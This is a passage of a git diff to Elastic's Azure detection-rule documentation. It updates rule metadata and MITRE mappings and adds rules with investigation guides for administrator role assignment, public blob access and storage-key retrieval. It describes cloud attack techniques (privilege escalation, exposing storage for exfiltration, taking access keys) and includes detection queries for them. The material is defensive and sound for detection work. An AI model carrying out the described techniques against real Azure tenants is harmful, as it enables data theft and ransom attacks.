Name: Disable or Modify Tools -** ID: T1562.001 -** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc index 31db43231d..13250e674a 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -114,6 +114,6 @@ event.dataset:azure.activitylogs and 
azure.activitylogs.operation_name:"MICROSOF ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: -** Name: Disable or Modify Tools -** ID: T1562.001 -** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc index c310b576fc..5ae32757d7 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-full-network-packet-capture-detected.asciidoc @@ -7,8 +7,8 @@ Identifies potential full network packet capture in Azure. Packet Capture is an *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies potential full network packet capture in Azure. Packet Capture is an *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies potential full network packet capture in Azure. Packet Capture is an * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc index 7ded2a49b7..439f849801 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-global-administrator-role-addition-to-pim-user.asciidoc @@ -7,8 +7,8 @@ Identifies an Azure Active Directory (AD) Global Administrator role addition to *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: high @@ -32,7 +32,7 @@ Identifies an Azure Active Directory (AD) Global Administrator role addition to * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -118,3 +118,7 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc index e9e7fd6a85..bff3ccc69c 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-events-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies when events are deleted in Azure Kubernetes. Kubernetes events are ob *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when events are deleted in Azure Kubernetes. 
Kubernetes events are ob *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when events are deleted in Azure Kubernetes. Kubernetes events are ob * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc index f1c74d2071..bc753a6644 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-pods-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kuber *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kuber *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kuber * Tactic: Impact * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -110,3 +110,11 @@ event.outcome:(Success or success) ** Name: Impact ** ID: TA0040 ** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ +* Technique: +** Name: System Shutdown/Reboot +** ID: T1529 +** Reference URL: https://attack.mitre.org/techniques/T1529/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc index 188cff5e57..810f1cf2d4 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-kubernetes-rolebindings-created.asciidoc @@ -7,8 +7,8 @@ Identifies the creation of role binding or cluster role bindings. You can assign *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the creation of role binding or cluster role bindings. You can assign *Runs every*: 5m -*Searches indices from*: now-20m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies the creation of role binding or cluster role bindings. 
You can assign * Tactic: Privilege Escalation * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,3 +113,19 @@ event.outcome:(Success or success) ** Name: Privilege Escalation ** ID: TA0004 ** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc index cd152a2154..b554236bb9 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-network-watcher-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a Network Watcher in Azure. Network Watchers are used *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of a Network Watcher in Azure. Network Watchers are used *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a Network Watcher in Azure. Network Watchers are used * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc index 72a2f47cea..449abbf770 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-privilege-identity-management-role-modified.asciidoc @@ -7,8 +7,8 @@ Azure Active Directory (AD) Privileged Identity Management (PIM) is a service th *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Azure Active Directory (AD) Privileged Identity Management (PIM) is a service th *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Azure Active Directory (AD) Privileged Identity Management (PIM) is a service th * Resources: Investigation Guide * Tactic: Persistence -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -117,9 +117,13 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ * Technique: -** Name: Valid Accounts -** ID: T1078 -** Reference URL: https://attack.mitre.org/techniques/T1078/ +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: 
Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ * Tactic: ** Name: Defense Evasion ** ID: TA0005 diff --git a/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc new file mode 100644 index 0000000000..c66772d7ce --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc @@ -0,0 +1,138 @@ +[[azure-rbac-built-in-administrator-roles-assigned]] +=== Azure RBAC Built-In Administrator Roles Assigned + +Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.activitylogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles +* https://orca.security/resources/research-pod/azure-identity-access-management-iam-active-directory-ad/ +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure RBAC Built-In Administrator Roles Assigned* + + +This rule identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. Assignment can be done via the Azure portal, Azure CLI, PowerShell, or through API calls. Monitoring these assignments helps detect potential unauthorized privilege escalations. + + +*Privileged Built-In Administrator Roles* + +- Contributor: b24988ac-6180-42a0-ab88-20f7382dd24c +- Owner: 8e3af657-a8ff-443c-a75c-2fe8c4bcb635 +- Azure File Sync Administrator: 92b92042-07d9-4307-87f7-36a593fc5850 +- Reservations Administrator: a8889054-8d42-49c9-bc1c-52486c10e7cd +- Role Based Access Control Administrator: f58310d9-a9f6-439a-9e8d-f62e7b41a168 +- User Access Administrator: 18d7d88d-d35e-4fb5-a5c3-7773c20a72d9 + + +*Possible investigation steps* + + +- Identify the user who assigned the role and examine their recent activity for any suspicious actions. 
+- Review the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Check the history of role assignments for the user who was assigned the role to determine if this is a recurring pattern or a one-time event. + - Additionally, identify the lifetime of the targeted user account to determine if it is a newly created account or an existing one. +- Determine if the user assigning the role historically has the necessary permissions to assign such roles and has done so in the past. +- Investigate any recent changes or activities performed by the newly assigned administrator to identify any suspicious actions or configurations that may have been altered. +- Correlate with other logs, such as Microsoft Entra ID sign-in logs, to identify any unusual access patterns or behaviors for the user. + + +*False positive analysis* + + +- Legitimate administrators may assign built-in administrator roles during routine operations, maintenance or as required for onboarding new staff. +- Review internal tickets, change logs, or admin activity dashboards for approved operations. + + +*Response and remediation* + + +- If administrative assignment was not authorized: + - Immediately remove the built-in administrator role from the account. + - Disable or lock the account and begin credential rotation. + - Audit activity performed by the account after elevation, especially changes to role assignments and resource access. +- If suspicious: + - Notify the user and confirm whether they performed the action. + - Check for any automation or scripts that could be exploiting unused elevated access paths. + - Review conditional access and PIM (Privileged Identity Management) configurations to limit elevation without approval. +- Strengthen posture: + - Require MFA and approval for all privilege escalation actions. + - Consider enabling JIT (Just-in-Time) access with expiration. 
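+
+The following is a minimal sketch of the enumeration step described above, assuming the `azure-identity` and `azure-mgmt-authorization` Python packages and a placeholder subscription ID; it lists subscription-scope role assignments and flags the privileged built-in role definition IDs from this guide.
+
+[source, python]
+----------------------------------
+from azure.identity import DefaultAzureCredential
+from azure.mgmt.authorization import AuthorizationManagementClient
+
+# Placeholder subscription ID; the GUIDs are the built-in administrator
+# role definitions listed earlier in this guide.
+SUBSCRIPTION_ID = "00000000-0000-0000-0000-000000000000"
+PRIVILEGED_ROLE_IDS = {
+    "b24988ac-6180-42a0-ab88-20f7382dd24c",  # Contributor
+    "8e3af657-a8ff-443c-a75c-2fe8c4bcb635",  # Owner
+    "92b92042-07d9-4307-87f7-36a593fc5850",  # Azure File Sync Administrator
+    "a8889054-8d42-49c9-bc1c-52486c10e7cd",  # Reservations Administrator
+    "f58310d9-a9f6-439a-9e8d-f62e7b41a168",  # Role Based Access Control Administrator
+    "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9",  # User Access Administrator
+}
+
+client = AuthorizationManagementClient(DefaultAzureCredential(), SUBSCRIPTION_ID)
+scope = f"/subscriptions/{SUBSCRIPTION_ID}"
+
+# List assignments at subscription scope and flag the privileged built-in roles.
+for assignment in client.role_assignments.list_for_scope(scope):
+    role_id = assignment.role_definition_id.rsplit("/", 1)[-1]
+    if role_id in PRIVILEGED_ROLE_IDS:
+        print(assignment.principal_id, role_id, assignment.scope)
+        # An unauthorized assignment could then be removed, for example:
+        # client.role_assignments.delete_by_id(assignment.id)
+----------------------------------
+
+Removal of an assignment should follow your change-management process, which is why the deletion call is shown only as a comment.
+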
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.activitylogs and + event.action: "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE" and + azure.activitylogs.properties.requestbody.properties.roleDefinitionId: + ( + *18d7d88d-d35e-4fb5-a5c3-7773c20a72d9* or + *f58310d9-a9f6-439a-9e8d-f62e7b41a168* or + *b24988ac-6180-42a0-ab88-20f7382dd24c* or + *8e3af657-a8ff-443c-a75c-2fe8c4bcb635* or + *92b92042-07d9-4307-87f7-36a593fc5850* or + *a8889054-8d42-49c9-bc1c-52486c10e7cd* + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc index 46c37eb193..29fed5f4e4 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-resource-group-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a resource group in Azure, which includes all resourc *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of a resource group in Azure, which includes all resourc *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a resource group in Azure, which includes all resourc * Tactic: Impact * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-blob-public-access-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-blob-public-access-enabled.asciidoc new file mode 100644 index 0000000000..fa5f1776dc --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-blob-public-access-enabled.asciidoc @@ -0,0 +1,115 @@ +[[azure-storage-account-blob-public-access-enabled]] +=== Azure Storage Account Blob Public Access Enabled + +Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. 
+ +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-configure + +*Tags*: + +* Domain: Cloud +* Domain: Storage +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Storage Account Blob Public Access Enabled* + + +Azure Storage Accounts provide cloud storage solutions with various access control mechanisms. The public access setting, when enabled, allows anonymous internet access to blob containers, bypassing authentication requirements. Adversaries exploit this feature to expose sensitive data for exfiltration or to establish persistent external access. This detection monitors for successful modifications that enable public blob access, a technique notably used in STORM-0501 cloud ransom-based campaigns. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal that initiated the storage account modification by examining the principal ID, UPN and user agent fields. +- Check the specific storage account name in `azure.resource.name` to understand which storage resources were affected and assess the sensitivity of data stored there. +- Investigate the timing of the event to correlate with any other suspicious activities, such as unusual login patterns or privilege escalation attempts. +- Examine the request or response body details to understand the full scope of changes made to the storage account configuration beyond public access settings. +- Review access logs for the affected storage account to identify any subsequent data access or exfiltration attempts following the public access enablement. +- Verify if the storage account modification aligns with approved change requests or maintenance windows in your organization. +- Check for other storage accounts modified by the same principal to identify potential lateral movement or widespread configuration changes. +- Pivot into related activity for the storage account and/or container such as data deletion, encryption or further permission changes. + + +*False positive analysis* + + +- Legitimate CDN integration or public website hosting may require enabling public blob access. Document approved storage accounts used for public content delivery and create exceptions for these specific resources. +- DevOps automation tools might temporarily enable public access during deployment processes. Identify service principals used by CI/CD pipelines and consider time-based exceptions during deployment windows. +- Testing and development environments may have different access requirements. Consider filtering out non-production storage accounts if public access is acceptable in those environments. +- Migration activities might require temporary public access. Coordinate with infrastructure teams to understand planned migrations and create temporary exceptions with defined expiration dates. 
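+
+To help separate approved public content hosting from unexpected changes, the following is a minimal sketch (assuming the `azure-identity` and `azure-mgmt-storage` Python packages and a placeholder subscription ID) that inventories which storage accounts currently allow public blob access; the results can seed an allowlist of approved accounts for tuning this rule.
+
+[source, python]
+----------------------------------
+from azure.identity import DefaultAzureCredential
+from azure.mgmt.storage import StorageManagementClient
+
+# Placeholder subscription ID for illustration.
+SUBSCRIPTION_ID = "00000000-0000-0000-0000-000000000000"
+
+client = StorageManagementClient(DefaultAzureCredential(), SUBSCRIPTION_ID)
+
+# Inventory accounts that currently permit anonymous blob access; the property
+# may be unset (None), which is treated the same as disabled here.
+for account in client.storage_accounts.list():
+    if account.allow_blob_public_access:
+        print(account.name, account.id)
+----------------------------------
+
+Accounts identified this way can be reviewed with their owners and, if approved, documented as exceptions to this rule.
+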
+ + +*Response and remediation* + + +- Immediately disable public blob access on the affected storage account using Azure Portal IaC, or Azure CLI command. +- Audit all blob containers within the affected storage account to identify which data may have been exposed and assess the potential impact of the exposure. +- Review Azure Activity Logs and storage access logs to determine if any data was accessed or exfiltrated while public access was enabled. +- Rotate any credentials, keys, or sensitive data that may have been stored in the exposed blob containers. +- If unauthorized modification is confirmed, disable the compromised user account or service principal and investigate how the credentials were obtained. +- Implement Azure Policy to prevent enabling public blob access on storage accounts containing sensitive data, using built-in policy definitions for storage account public access restrictions. +- Consider implementing private endpoints for storage accounts that should never be publicly accessible, ensuring network-level isolation. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +event.action: "MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE" and +event.outcome: "success" and +azure.activitylogs.properties.responseBody: *\"allowBlobPublicAccess\"\:true* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc index f4a0cfbe50..8793d34972 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-key-regenerated.asciidoc @@ -7,8 +7,8 @@ Identifies a rotation to storage account access keys in Azure. Regenerating acce *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies a rotation to storage account access keys in Azure. Regenerating acce *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies a rotation to storage account access keys in Azure. 
Regenerating acce * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -110,6 +110,22 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: TA0006 ** Reference URL: https://attack.mitre.org/tactics/TA0006/ * Technique: -** Name: Steal Application Access Token -** ID: T1528 -** Reference URL: https://attack.mitre.org/techniques/T1528/ +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc new file mode 100644 index 0000000000..6e961d6014 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc @@ -0,0 +1,139 @@ +[[azure-storage-account-keys-accessed-by-privileged-user]] +=== Azure Storage Account Keys Accessed by Privileged User + +Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Azure Activity Logs +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure Storage Account Keys Accessed by Privileged User* + + +Azure Storage Account keys provide full administrative access to storage resources. While legitimate administrators may occasionally need to access these keys, Microsoft recommends using more granular access methods like Shared Access Signatures (SAS) or Azure AD authentication. 
This detection identifies when users with high-privilege roles (Owner, Contributor, Storage Account Contributor, or User Access Administrator) access storage account keys, particularly focusing on unusual patterns that may indicate compromise. This technique was notably observed in STORM-0501 ransomware campaigns where compromised identities retrieved keys for unauthorized storage operations. + + +*Possible investigation steps* + + +- Review the `azure.activitylogs.identity.authorization.evidence.principal_id` to identify the specific user who accessed the storage account keys. +- Examine the `azure.resource.name` field to determine which storage account's keys were accessed and assess the sensitivity of data stored there. +- Check the `azure.activitylogs.identity.authorization.evidence.role` to confirm the user's assigned role and whether this level of access is justified for their job function. +- Investigate the timing and frequency of the key access event - multiple key retrievals in a short timeframe may indicate automated exfiltration attempts. +- Review the source IP address and geographic location of the access request to identify any anomalous access patterns or locations. +- Correlate this event with other activities by the same principal ID, looking for patterns such as permission escalations, unusual data access, or configuration changes. +- Check Azure AD sign-in logs for the user around the same timeframe to identify any suspicious authentication events or MFA bypasses. +- Examine subsequent storage account activities to determine if the retrieved keys were used for data access, modification, or exfiltration. + + +*False positive analysis* + + +- DevOps and infrastructure teams may legitimately access storage keys during deployment or migration activities. Document these planned activities and consider creating exceptions for specific time windows. +- Emergency troubleshooting scenarios may require administrators to retrieve storage keys. Establish a process for documenting these emergency accesses and review them regularly. +- Automated backup or disaster recovery systems might use high-privilege service accounts that occasionally need key access. Consider using managed identities or service principals with more restricted permissions instead. +- Legacy applications that haven't been migrated to use SAS tokens or Azure AD authentication may still require key-based access. Plan to modernize these applications and track them as exceptions in the meantime. +- New storage account provisioning by administrators will often include initial key retrieval. Consider the age of the storage account when evaluating the risk level. + + +*Response and remediation* + + +- Immediately rotate the storage account keys that were accessed using Azure Portal or Azure CLI. +- Review all recent activities on the affected storage account to identify any unauthorized data access, modification, or exfiltration attempts. +- If unauthorized access is confirmed, disable the compromised user account and initiate password reset procedures. +- Audit all storage accounts accessible by the compromised identity and rotate keys for any accounts that may have been accessed. +- Implement Entra ID authentication or SAS tokens for applications currently using storage account keys to reduce future risk. +- Configure Azure Policy to restrict the listKeys operation to specific roles or require additional approval workflows. 
